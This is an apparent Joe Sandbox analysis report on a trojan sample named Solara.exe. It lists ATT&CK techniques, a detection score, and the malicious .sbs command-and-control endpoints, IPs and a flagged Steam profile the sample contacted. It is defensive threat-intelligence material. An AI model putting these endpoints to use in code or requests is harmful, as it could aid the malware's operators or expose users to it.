Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Solara.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://steamcommunity.com:443/profiles/76561199724331900	100%	URL Reputation	malware
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
condifendteu.sbs	172.67.141.136	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
vennurviot.sbs	172.67.140.193	true	true	unknown
drawwyobstacw.sbs	188.114.96.3	true	true	unknown
mathcucom.sbs	188.114.97.3	true	true	unknown
sergei-esenin.com	104.21.53.8	true	true	unknown
ehticsprocw.sbs	104.21.30.221	true	true	unknown
resinedyw.sbs	104.21.77.78	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
enlargkiw.sbs	104.21.33.249	true	true	unknown
allocatinow.sbs	unknown	unknown	true	unknown
explorationmsn.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true		unknown
allocatinow.sbs	true		unknown
drawwyobstacw.sbs	true		unknown
mathcucom.sbs	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true		unknown
ehticsprocw.sbs	true		unknown
condifendteu.sbs	true		unknown
https://drawwyobstacw.sbs/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	Solara.exe, 00000001.00000003.1807265156.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807410571.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://player.vimeo.com	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/apiU	Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/	Solara.exe, 00000001.00000003.1828000747.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1814943292.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vennurviot.sbs/	Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drawwyobstacw.sbs/api9et	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steam.tv/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic2~	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://resinedyw.sbs/2	Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com:443/profiles/76561199724331900	Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://store.steampowered.com/points/shop/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/	Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sketchfab.com	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/m	Solara.exe, 00000001.00000003.1807430928.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807265156.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.cloudflare.com/learning/access-man	Solara.exe, 00000001.00000003.1814350837.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1814184391.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drawwyobstacw.sbs/T	Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/5xx-error-landing	Solara.exe, 00000001.00000003.1807265156.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807265156.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807410571.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1829163932.0000000003536000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828171164.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807390109.0000000001000000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/learning/access-manHY	Solara.exe, 00000001.00000002.1829163932.0000000003536000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/api	Solara.exe, 00000001.00000003.1828000747.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://condifendteu.sbs/1	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/apit	Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drawwyobstacw.sbs/apiKtJ	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliO	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://resinedyw.sbs/apitrf	Solara.exe, 00000001.00000003.1738612549.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ehticsprocw.sbs/	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/market/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drawwyobstacw.sbs/apioe	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://condifendteu.sbs/apiNtM	Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/access-m	Solara.exe, 00000001.00000002.1829163932.0000000003534000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/access-mY	Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/pu	Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/subscriber_agreement/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/0	Solara.exe, 00000001.00000003.1814184391.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://medal.tv	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/	Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	mathcucom.sbs	European Union	13335	CLOUDFLARENETUS	true
104.21.33.249	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.30.221	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	drawwyobstacw.sbs	European Union	13335	CLOUDFLARENETUS	true
172.67.141.136	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.140.193	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.77.78	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532354
Start date and time:	2024-10-13 01:32:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Solara.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@11/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 28 Number of non-executed functions: 283
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

